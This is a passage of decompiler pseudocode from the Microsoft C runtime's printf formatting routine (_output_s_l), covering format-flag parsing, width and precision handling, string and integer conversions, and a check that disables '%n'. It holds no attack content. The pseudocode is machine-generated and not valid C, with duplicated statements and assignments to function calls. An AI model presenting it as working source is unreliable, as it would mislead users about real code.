    																				if( *__ecx == 0x78) {
    																					goto L65;
    																				}
    																				L64:
    																				__eax =  *(__ebp + 0xc);
    																				__ecx =  *( *(__ebp + 0xc));
    																				__eflags = __ecx - 0x58;
    																				if(__ecx != 0x58) {
    																					 *(__ebp - 0x25c) = 0;
    																					goto L18;
    																				}
    																				goto L65;
    																			}
    																			L57:
    																			__ecx =  *(__ebp + 0xc);
    																			__edx =  *((char*)(__ecx + 1));
    																			__eflags =  *((char*)(__ecx + 1)) - 0x32;
    																			if( *((char*)(__ecx + 1)) != 0x32) {
    																				goto L59;
    																			} else {
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) & 0xffff7fff;
    																				 *(__ebp - 0x10) = __ecx;
    																				goto L67;
    																			}
    																		}
    																		L54:
    																		__ecx =  *(__ebp + 0xc);
    																		__edx =  *((char*)(__ecx + 1));
    																		__eflags =  *((char*)(__ecx + 1)) - 0x34;
    																		if( *((char*)(__ecx + 1)) != 0x34) {
    																			goto L56;
    																		} else {
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) | 0x00008000;
    																			 *(__ebp - 0x10) = __ecx;
    																			goto L67;
    																		}
    																	case 1:
    																		L68:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																		goto L70;
    																	case 2:
    																		L49:
    																		__eax =  *(__ebp + 0xc);
    																		__ecx =  *( *(__ebp + 0xc));
    																		__eflags = __ecx - 0x6c;
    																		if(__ecx != 0x6c) {
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) | 0x00000010;
    																			__eflags = __ecx;
    																			 *(__ebp - 0x10) = __ecx;
    																		} else {
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																		}
    																		goto L70;
    																	case 3:
    																		L69:
    																		__eax =  *(__ebp - 0x10);
    																		__eax =  *(__ebp - 0x10) | 0x00000800;
    																		__eflags = __eax;
    																		 *(__ebp - 0x10) = __eax;
    																		goto L70;
    																	case 4:
    																		goto L70;
    																}
    															case 7:
    																L71:
    																__ecx =  *((char*)(__ebp - 0x251));
    																 *(__ebp - 0x324) = __ecx;
    																 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    																 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    																__eflags =  *(__ebp - 0x324) - 0x37;
    																if( *(__ebp - 0x324) > 0x37) {
    																	while(1) {
    																		L190:
    																		__eflags =  *(__ebp - 0x28);
    																		if( *(__ebp - 0x28) != 0) {
    																			goto L216;
    																		}
    																		goto L191;
    																	}
    																}
    																L72:
    																_t156 =  *(__ebp - 0x324) + 0xb95d9c; // 0xcccccc0d
    																__ecx =  *_t156 & 0x000000ff;
    																switch( *((intOrPtr*)(__ecx * 4 +  &M00B95D60))) {
    																	case 0:
    																		L123:
    																		 *(__ebp - 0x2c) = 1;
    																		__ecx =  *((char*)(__ebp - 0x251));
    																		__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
    																		__eflags = __ecx;
    																		 *((char*)(__ebp - 0x251)) = __cl;
    																		goto L124;
    																	case 1:
    																		L73:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																		__eflags =  *(__ebp - 0x10) & 0x00000830;
    																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																			__eax =  *(__ebp - 0x10);
    																			__eax =  *(__ebp - 0x10) | 0x00000800;
    																			__eflags = __eax;
    																			 *(__ebp - 0x10) = __eax;
    																		}
    																		goto L75;
    																	case 2:
    																		L88:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																		__eflags =  *(__ebp - 0x10) & 0x00000830;
    																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) | 0x00000800;
    																			__eflags = __ecx;
    																			 *(__ebp - 0x10) = __ecx;
    																		}
    																		goto L90;
    																	case 3:
    																		L147:
    																		 *(__ebp - 0x260) = 7;
    																		L148:
    																		 *(__ebp - 8) = 0x10;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																		__eflags =  *(__ebp - 0x10) & 0x00000080;
    																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																			 *(__ebp - 0x14) = 0x30;
    																			 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
    																			__eflags =  *(__ebp - 0x260) + 0x51;
    																			 *((char*)(__ebp - 0x13)) = __al;
    																			 *(__ebp - 0x1c) = 2;
    																		}
    																		goto L153;
    																	case 4:
    																		L81:
    																		__eax = __ebp + 0x14;
    																		 *(__ebp - 0x288) = E00B93D50(__ebp + 0x14);
    																		__eflags =  *(__ebp - 0x288);
    																		if( *(__ebp - 0x288) == 0) {
    																			L83:
    																			__edx =  *0xd121a0; // 0xb775a0
    																			 *(__ebp - 4) = __edx;
    																			__eax =  *(__ebp - 4);
    																			 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																			L87:
    																			goto L190;
    																		}
    																		L82:
    																		__ecx =  *(__ebp - 0x288);
    																		__eflags =  *(__ecx + 4);
    																		if( *(__ecx + 4) != 0) {
    																			L84:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																			__eflags =  *(__ebp - 0x10) & 0x00000800;
    																			if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																				 *(__ebp - 0xc) = 0;
    																				__edx =  *(__ebp - 0x288);
    																				__eax =  *(__edx + 4);
    																				 *(__ebp - 4) =  *(__edx + 4);
    																				__ecx =  *(__ebp - 0x288);
    																				__edx =  *__ecx;
    																				 *(__ebp - 0x24) =  *__ecx;
    																			} else {
    																				__edx =  *(__ebp - 0x288);
    																				__eax =  *(__edx + 4);
    																				 *(__ebp - 4) =  *(__edx + 4);
    																				__ecx =  *(__ebp - 0x288);
    																				__eax =  *__ecx;
    																				asm("cdq");
    																				 *__ecx - __edx =  *__ecx - __edx >> 1;
    																				 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																				 *(__ebp - 0xc) = 1;
    																			}
    																			goto L87;
    																		}
    																		goto L83;
    																	case 5:
    																		L124:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		__eax = __ebp - 0x248;
    																		 *(__ebp - 4) = __ebp - 0x248;
    																		 *(__ebp - 0x44) = 0x200;
    																		__eflags =  *(__ebp - 0x30);
    																		if( *(__ebp - 0x30) >= 0) {
    																			L126:
    																			__eflags =  *(__ebp - 0x30);
    																			if( *(__ebp - 0x30) != 0) {
    																				L129:
    																				__eflags =  *(__ebp - 0x30) - 0x200;
    																				if( *(__ebp - 0x30) > 0x200) {
    																					 *(__ebp - 0x30) = 0x200;
    																				}
    																				L131:
    																				__eflags =  *(__ebp - 0x30) - 0xa3;
    																				if( *(__ebp - 0x30) > 0xa3) {
    																					 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																					 *(__ebp - 0x20) = L00B7DEA0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																					__eflags =  *(__ebp - 0x20);
    																					if( *(__ebp - 0x20) == 0) {
    																						 *(__ebp - 0x30) = 0xa3;
    																					} else {
    																						__eax =  *(__ebp - 0x20);
    																						 *(__ebp - 4) =  *(__ebp - 0x20);
    																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																						 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																					}
    																				}
    																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																				__eax =  *(__ebp + 0x14);
    																				__ecx =  *(__eax - 8);
    																				__edx =  *(__eax - 4);
    																				 *(__ebp - 0x2a8) =  *(__eax - 8);
    																				 *(__ebp - 0x2a4) =  *(__eax - 4);
    																				__ecx = __ebp - 0x40;
    																				_push(E00B7C680(__ebp - 0x40));
    																				__eax =  *(__ebp - 0x2c);
    																				_push( *(__ebp - 0x2c));
    																				__ecx =  *(__ebp - 0x30);
    																				_push( *(__ebp - 0x30));
    																				__edx =  *((char*)(__ebp - 0x251));
    																				_push( *((char*)(__ebp - 0x251)));
    																				__eax =  *(__ebp - 0x44);
    																				_push( *(__ebp - 0x44));
    																				__ecx =  *(__ebp - 4);
    																				_push( *(__ebp - 4));
    																				__edx = __ebp - 0x2a8;
    																				_push(__ebp - 0x2a8);
    																				__eax =  *0xd12188; // 0xddc09d6c
    																				__eax =  *__eax();
    																				__esp = __esp + 0x1c;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																				__eflags =  *(__ebp - 0x10) & 0x00000080;
    																				if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																					__eflags =  *(__ebp - 0x30);
    																					if( *(__ebp - 0x30) == 0) {
    																						__ecx = __ebp - 0x40;
    																						_push(E00B7C680(__ebp - 0x40));
    																						__edx =  *(__ebp - 4);
    																						_push( *(__ebp - 4));
    																						__eax =  *0xd12194; // 0xddc09d6c
    																						__eax =  *__eax();
    																						__esp = __esp + 8;
    																					}
    																				}
    																				__ecx =  *((char*)(__ebp - 0x251));
    																				__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
    																				if( *((char*)(__ebp - 0x251)) == 0x67) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																					__eflags =  *(__ebp - 0x10) & 0x00000080;
    																					if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																						__ecx = __ebp - 0x40;
    																						_push(E00B7C680(__ebp - 0x40));
    																						__eax =  *(__ebp - 4);
    																						_push( *(__ebp - 4));
    																						__ecx =  *0xd12190; // 0xddc09d6c
    																						E00B849C0(__ecx) =  *__eax();
    																						__esp = __esp + 8;
    																					}
    																				}
    																				__edx =  *(__ebp - 4);
    																				__eax =  *( *(__ebp - 4));
    																				__eflags =  *( *(__ebp - 4)) - 0x2d;
    																				if( *( *(__ebp - 4)) == 0x2d) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																					__edx =  *(__ebp - 4);
    																					__edx =  *(__ebp - 4) + 1;
    																					__eflags = __edx;
    																					 *(__ebp - 4) = __edx;
    																				}
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																				do {
    																					L190:
    																					__eflags =  *(__ebp - 0x28);
    																					if( *(__ebp - 0x28) != 0) {
    																						goto L216;
    																					}
    																					goto L191;
    																				} while ( *(__ebp - 0x324) > 0x37);
    																				goto L72;
    																			}
    																			L127:
    																			__ecx =  *((char*)(__ebp - 0x251));
    																			__eflags = __ecx - 0x67;
    																			if(__ecx != 0x67) {
    																				goto L129;
    																			}
    																			L128:
    																			 *(__ebp - 0x30) = 1;
    																			goto L131;
    																		}
    																		L125:
    																		 *(__ebp - 0x30) = 6;
    																		goto L131;
    																	case 6:
    																		L75:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																		__eflags =  *(__ebp - 0x10) & 0x00000810;
    																		if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																			__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x284) = __ax;
    																			__cl =  *(__ebp - 0x284);
    																			 *(__ebp - 0x248) = __cl;
    																			 *(__ebp - 0x24) = 1;
    																		} else {
    																			 *(__ebp - 0x280) = 0;
    																			__edx = __ebp + 0x14;
    																			__eax = E00B93D90(__ebp + 0x14);
    																			 *(__ebp - 0x258) = __ax;
    																			__eax =  *(__ebp - 0x258) & 0x0000ffff;
    																			__ecx = __ebp - 0x248;
    																			__edx = __ebp - 0x24;
    																			 *(__ebp - 0x280) = E00B97890(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
    																			__eflags =  *(__ebp - 0x280);
    																			if( *(__ebp - 0x280) != 0) {
    																				 *(__ebp - 0x28) = 1;
    																			}
    																		}
    																		__edx = __ebp - 0x248;
    																		 *(__ebp - 4) = __ebp - 0x248;
    																		while(1) {
    																			L190:
    																			__eflags =  *(__ebp - 0x28);
    																			if( *(__ebp - 0x28) != 0) {
    																				goto L216;
    																			}
    																			goto L191;
    																		}
    																	case 7:
    																		L144:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																		 *(__ebp - 8) = 0xa;
    																		L153:
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																		__eflags =  *(__ebp - 0x10) & 0x00008000;
    																		if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																			__eflags =  *(__ebp - 0x10) & 0x00001000;
    																			if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																				__eflags =  *(__ebp - 0x10) & 0x00000020;
    																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																					__eflags =  *(__ebp - 0x10) & 0x00000040;
    																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																						__ecx = __ebp + 0x14;
    																						__eax = E00B93D50(__ebp + 0x14);
    																						__edx = 0;
    																						__eflags = 0;
    																						 *(__ebp - 0x2b8) = __eax;
    																						 *(__ebp - 0x2b4) = 0;
    																					} else {
    																						__eax = __ebp + 0x14;
    																						__eax = E00B93D50(__ebp + 0x14);
    																						asm("cdq");
    																						 *(__ebp - 0x2b8) = __eax;
    																						 *(__ebp - 0x2b4) = __edx;
    																					}
    																				} else {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																					__eflags =  *(__ebp - 0x10) & 0x00000040;
    																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																						__ecx = __ebp + 0x14;
    																						E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																						asm("cdq");
    																						 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																						 *(__ebp - 0x2b4) = __edx;
    																					} else {
    																						__eax = __ebp + 0x14;
    																						__eax = E00B93D50(__ebp + 0x14);
    																						__ax = __eax;
    																						asm("cdq");
    																						 *(__ebp - 0x2b8) = __eax;
    																						 *(__ebp - 0x2b4) = __edx;
    																					}
    																				}
    																			} else {
    																				__eax = __ebp + 0x14;
    																				 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x2b4) = __edx;
    																			}
    																		} else {
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																			 *(__ebp - 0x2b4) = __edx;
    																		}
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																		__eflags =  *(__ebp - 0x10) & 0x00000040;
    																		if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																			goto L170;
    																		}
    																	case 8:
    																		L109:
    																		__ecx = __ebp + 0x14;
    																		 *(__ebp - 0x298) = E00B93D50(__ebp + 0x14);
    																		__eax = E00B97280();
    																		__eflags = __eax;
    																		if(__eax != 0) {
    																			L119:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																			__eflags =  *(__ebp - 0x10) & 0x00000020;
    																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																				__edx =  *(__ebp - 0x298);
    																				__eax =  *(__ebp - 0x24c);
    																				 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																			} else {
    																				__eax =  *(__ebp - 0x298);
    																				 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    																			}
    																			 *(__ebp - 0x28) = 1;
    																			while(1) {
    																				L190:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L216;
    																				}
    																				goto L191;
    																			}
    																		}
    																		L110:
    																		__edx = 0;
    																		__eflags = 0;
    																		if(0 == 0) {
    																			 *(__ebp - 0x32c) = 0;
    																		} else {
    																			 *(__ebp - 0x32c) = 1;
    																		}
    																		__eax =  *(__ebp - 0x32c);
    																		 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
    																		__eflags =  *(__ebp - 0x29c);
    																		if( *(__ebp - 0x29c) == 0) {
    																			_push(L"(\"\'n\' format specifier disabled\", 0)");
    																			_push(0);
    																			_push(0x695);
    																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																			_push(2);
    																			__eax = L00B7D760();
    																			__esp = __esp + 0x14;
    																			__eflags = __eax - 1;
    																			if(__eax == 1) {
    																				asm("int3");
    																			}
    																		}
    																		__eflags =  *(__ebp - 0x29c);
    																		if( *(__ebp - 0x29c) != 0) {
    																			L118:
    																			while(1) {
    																				L190:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L216;
    																				}
    																				goto L191;
    																			}
    																		} else {
    																			L117:
    																			 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																			__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																			 *(__ebp - 0x2f8) = 0xffffffff;
    																			__ecx = __ebp - 0x40;
    																			__eax = E00B7C650(__ecx);
    																			__eax =  *(__ebp - 0x2f8);
    																			goto L229;
    																		}
    																	case 9:
    																		L151:
    																		 *(__ebp - 8) = 8;
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																		__eflags =  *(__ebp - 0x10) & 0x00000080;
    																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																			__edx =  *(__ebp - 0x10);
    																			__edx =  *(__ebp - 0x10) | 0x00000200;
    																			__eflags = __edx;
    																			 *(__ebp - 0x10) = __edx;
    																		}
    																		while(1) {
    																			L153:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																			__eflags =  *(__ebp - 0x10) & 0x00008000;
    																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																				__eflags =  *(__ebp - 0x10) & 0x00001000;
    																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																					__eflags =  *(__ebp - 0x10) & 0x00000020;
    																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__edx = 0;
    																							__eflags = 0;
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = 0;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = __edx;
    																						}
    																					} else {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																							 *(__ebp - 0x2b4) = __edx;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__ax = __eax;
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = __edx;
    																						}
    																					}
    																				} else {
    																					__eax = __ebp + 0x14;
    																					 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x2b4) = __edx;
    																				}
    																			} else {
    																				__ecx = __ebp + 0x14;
    																				 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x2b4) = __edx;
    																			}
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																			__eflags =  *(__ebp - 0x10) & 0x00000040;
    																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																				goto L170;
    																			}
    																			goto L166;
    																		}
    																	case 0xa:
    																		L146:
    																		 *(__ebp - 0x30) = 8;
    																		goto L147;
    																	case 0xb:
    																		L90:
    																		__eflags =  *(__ebp - 0x30) - 0xffffffff;
    																		if( *(__ebp - 0x30) != 0xffffffff) {
    																			__edx =  *(__ebp - 0x30);
    																			 *(__ebp - 0x328) =  *(__ebp - 0x30);
    																		} else {
    																			 *(__ebp - 0x328) = 0x7fffffff;
    																		}
    																		__eax =  *(__ebp - 0x328);
    																		 *(__ebp - 0x290) =  *(__ebp - 0x328);
    																		__ecx = __ebp + 0x14;
    																		 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    																		__eflags =  *(__ebp - 0x10) & 0x00000810;
    																		if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    																			L101:
    																			__eflags =  *(__ebp - 4);
    																			if( *(__ebp - 4) == 0) {
    																				__edx =  *0xd121a0; // 0xb775a0
    																				 *(__ebp - 4) = __edx;
    																			}
    																			__eax =  *(__ebp - 4);
    																			 *(__ebp - 0x28c) =  *(__ebp - 4);
    																			while(1) {
    																				L104:
    																				__ecx =  *(__ebp - 0x290);
    																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																				__eflags = __ecx;
    																				if(__ecx == 0) {
    																					break;
    																				}
    																				L105:
    																				__eax =  *(__ebp - 0x28c);
    																				__ecx =  *( *(__ebp - 0x28c));
    																				__eflags = __ecx;
    																				if(__ecx == 0) {
    																					break;
    																				}
    																				L106:
    																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    																			}
    																			L107:
    																			__eax =  *(__ebp - 0x28c);
    																			__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
    																			__eflags = __eax;
    																			 *(__ebp - 0x24) = __eax;
    																			goto L108;
    																		} else {
    																			L94:
    																			__eflags =  *(__ebp - 4);
    																			if( *(__ebp - 4) == 0) {
    																				__eax =  *0xd121a4; // 0xb77590
    																				 *(__ebp - 4) = __eax;
    																			}
    																			 *(__ebp - 0xc) = 1;
    																			__ecx =  *(__ebp - 4);
    																			 *(__ebp - 0x294) =  *(__ebp - 4);
    																			while(1) {
    																				L97:
    																				__edx =  *(__ebp - 0x290);
    																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																				 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    																				__eflags =  *(__ebp - 0x290);
    																				if( *(__ebp - 0x290) == 0) {
    																					break;
    																				}
    																				L98:
    																				__ecx =  *(__ebp - 0x294);
    																				__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
    																				__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
    																				if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
    																					break;
    																				}
    																				L99:
    																				 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																				 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    																			}
    																			L100:
    																			 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
    																			__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
    																			 *(__ebp - 0x24) = __ecx;
    																			L108:
    																			while(1) {
    																				L190:
    																				__eflags =  *(__ebp - 0x28);
    																				if( *(__ebp - 0x28) != 0) {
    																					goto L216;
    																				}
    																				goto L191;
    																			}
    																		}
    																	case 0xc:
    																		L145:
    																		 *(__ebp - 8) = 0xa;
    																		while(1) {
    																			L153:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    																			__eflags =  *(__ebp - 0x10) & 0x00008000;
    																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																				__eflags =  *(__ebp - 0x10) & 0x00001000;
    																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																					__eflags =  *(__ebp - 0x10) & 0x00000020;
    																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__edx = 0;
    																							__eflags = 0;
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = 0;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = __edx;
    																						}
    																					} else {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																						__eflags =  *(__ebp - 0x10) & 0x00000040;
    																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																							__ecx = __ebp + 0x14;
    																							E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																							 *(__ebp - 0x2b4) = __edx;
    																						} else {
    																							__eax = __ebp + 0x14;
    																							__eax = E00B93D50(__ebp + 0x14);
    																							__ax = __eax;
    																							asm("cdq");
    																							 *(__ebp - 0x2b8) = __eax;
    																							 *(__ebp - 0x2b4) = __edx;
    																						}
    																					}
    																				} else {
    																					__eax = __ebp + 0x14;
    																					 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																					 *(__ebp - 0x2b4) = __edx;
    																				}
    																			} else {
    																				__ecx = __ebp + 0x14;
    																				 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    																				 *(__ebp - 0x2b4) = __edx;
    																			}
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																			__eflags =  *(__ebp - 0x10) & 0x00000040;
    																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																				goto L170;
    																			}
    																			goto L166;
    																		}
    																	case 0xd:
    																		goto L0;
    																	case 0xe:
    																		while(1) {
    																			L190:
    																			__eflags =  *(__ebp - 0x28);
    																			if( *(__ebp - 0x28) != 0) {
    																				goto L216;
    																			}
    																			goto L191;
    																		}
    																}
    															case 8:
    																L30:
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    																goto L33;
    															case 9:
    																L31:
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																goto L33;
    															case 0xa:
    																L29:
    																__ecx =  *(__ebp - 0x10);
    																__ecx =  *(__ebp - 0x10) | 0x00000001;
    																 *(__ebp - 0x10) = __ecx;
    																goto L33;
    															case 0xb:
    																L28:
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																goto L33;
    															case 0xc:
    																L32:
    																__ecx =  *(__ebp - 0x10);
    																__ecx =  *(__ebp - 0x10) | 0x00000008;
    																__eflags = __ecx;
    																 *(__ebp - 0x10) = __ecx;
    																goto L33;
    															case 0xd:
    																L33:
    																goto L218;
    														}
    													} else {
    														if(0 == 0) {
    															 *(_t557 - 0x314) = 0;
    														} else {
    															 *(_t557 - 0x314) = 1;
    														}
    														_t543 =  *(_t557 - 0x314);
    														 *(_t557 - 0x278) =  *(_t557 - 0x314);
    														if( *(_t557 - 0x278) == 0) {
    															_push( &M00B77C38);
    															_push(0);
    															_push(0x460);
    															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    															_push(2);
    															_t526 = L00B7D760();
    															_t559 = _t559 + 0x14;
    															if(_t526 == 1) {
    																asm("int3");
    															}
    														}
    														L14:
    														if( *(_t557 - 0x278) != 0) {
    															goto L16;
    														} else {
    															 *((intOrPtr*)(L00B80C60(_t543))) = 0x16;
